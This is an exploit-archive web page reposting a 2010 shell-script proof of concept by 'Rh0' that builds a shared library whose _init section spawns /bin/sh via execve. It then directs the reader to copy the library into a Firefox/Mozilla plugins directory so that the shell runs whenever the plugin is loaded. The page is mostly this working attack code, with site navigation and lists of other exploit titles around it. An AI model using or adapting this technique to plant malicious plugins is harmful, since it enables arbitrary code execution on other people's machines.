首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Local Glibc shared library (.so) <= 2.11.1 exploit
来源:Rh0@z1p.biz 作者:Rh0 发布时间:2010-04-08  

# Exploit Title: Local Glibc shared library (.so) exploit
# Date: 07.04.10
# Author: Rh0 (Rh0@z1p.biz)
# Software Link: NA
# Version: <= 2.11.1, higher not tested
# Tested on: Debian stable (x86-64), Ubunutu 9.10 (x86), Fedora 12 (x86)
# CVE : NA
# Code :

#!/bin/sh

# A lot of applications in linux use shared library structure to be
# able to load plugins. E.g. Mozilla, Geany IDE, Compiz, Epiphany web
# browser and more. Shared libraries are initialized (but not loaded)
# often during startup, at a click at something like "->Tools->Plugins"
# in the menue or at latest when they are activated. dlopen() is used
# for initializing and is part of glibc.
# See http://linux.die.net/man/3/dlopen.
# It always executes the _init section of the shared library. A
# malformed _init section makes dlopen crash (NULL dereference). But
# this is not even necessary to exploit an application, as a custom
# _init section is always executed when dlopen is called . The exploit
# can be in the form of a custom compiled file. Also the _init section in
# a plugin already shipped with the application can be overwritten with
# working shellcode to exploit it or some \x41 to crash it .

# PoC:

cat >Xlibx.c<<EOF

#include <unistd.h>
_init()
{
execve("/bin/sh",NULL,NULL); // evil _init
}
EOF

gcc -fPIC -c Xlibx.c
ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
rm Xlibx.c
rm Xlibx.o

echo "* copy Xlibx.so to appropriate directory:"
echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
echo "* firefox->Edit->Preferences => Exploit "


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Denial of Service in McAfee Em
·Anyzip (.zip) v1.1 0day Poc (S
·Internal Information Disclosur
·Multiple Vendor librpc.dll Sig
·Local Privilege Escalation in
·CompleteFTP v3.3.0 - Remote Me
·Internet Explorer Tabular Data
·Miniature Java Web Server <= 1
·ilchClan <= 1.0.5 (cid) SQL In
·WinSoftMagic Photo Editor .PNG
·MyVideoConverter v2.15 Local D
·Java Deployment Toolkit Perfor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved